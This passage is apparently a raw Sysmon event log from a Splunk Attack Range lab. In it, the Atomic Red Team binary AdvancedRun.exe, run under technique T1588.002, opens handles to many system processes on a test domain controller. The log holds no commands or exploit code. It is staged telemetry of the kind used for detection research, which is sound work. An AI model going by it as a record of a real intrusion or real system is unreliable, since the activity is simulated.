Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 